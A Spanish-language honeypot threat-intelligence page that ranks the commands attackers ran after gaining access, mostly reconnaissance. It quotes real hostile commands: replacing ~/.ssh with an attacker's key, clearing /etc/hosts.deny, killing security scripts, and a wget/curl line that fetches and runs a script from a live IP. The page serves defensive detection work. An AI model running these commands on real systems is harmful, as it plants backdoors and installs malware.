Comandos Ejecutados

Analisis en tiempo real de los comandos mas ejecutados por atacantes tras obtener acceso a sistemas. Datos recopilados de nuestra red global de honeypots en las ultimas 24 horas.

14.184 comandos en 24h

Top Comandos Ejecutados

$Enter new UNIX password:

389 IPs1074x

$lockr -ia .ssh

459 IPs744x

$cd ~; chattr -ia .ssh; lockr -ia .ssh

407 IPs610x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

403 IPs599x

$cat /proc/cpuinfo | grep name | wc -l

404 IPs598x

$uname -a

391 IPs598x

$uname

396 IPs591x

$uname -m

390 IPs587x

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

400 IPs580x

10.

$whoami

385 IPs575x

11.

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

389 IPs575x

12.

$crontab -l

386 IPs572x

13.

$cat /proc/cpuinfo | grep model | grep name | wc -l

384 IPs570x

14.

$lscpu | grep Model

378 IPs565x

15.

$w

380 IPs559x

16.

$top

378 IPs557x

17.

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

373 IPs548x

18.

$which ls

375 IPs542x

19.

$ls -lh $(which ls)

359 IPs496x

20.

$uname -s -v -n -m 2 > /dev/null

127 IPs417x

21.

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version

119 IPs376x

22.

$cat /proc/uptime 2 > /dev/null | cut -d. -f1

47 IPs240x

23.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

124 IPs127x

24.

$uname -m 2 > /dev/null

47 IPs126x

25.

$/bin/./uname -s -v -n -r -m

16 IPs42x

26.

$uname -s -v -n -r -m

14 IPs30x

27.

$then

5 IPs14x

28.

$if [ [ ! -d ${HOME}/.ssh ] ]

5 IPs14x

29.

$nproc

5 IPs13x

30.

cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android

4 IPs12x

Reconocimiento

Comandos para obtener informacion del sistema (uname, whoami, cat /etc/passwd)

Descarga

Comandos para descargar malware (wget, curl, tftp)

Persistencia

Comandos para mantener acceso (crontab, chmod, chattr)

Movimiento Lateral

Comandos para expandirse en la red (ssh, scp, ping)

Acerca de estos datos

Estos comandos son capturados en tiempo real cuando atacantes obtienen acceso a nuestros honeypots. Representan las tecnicas reales utilizadas en ataques automatizados y manuales. Utiliza esta informacion para mejorar tu deteccion de amenazas y respuesta a incidentes.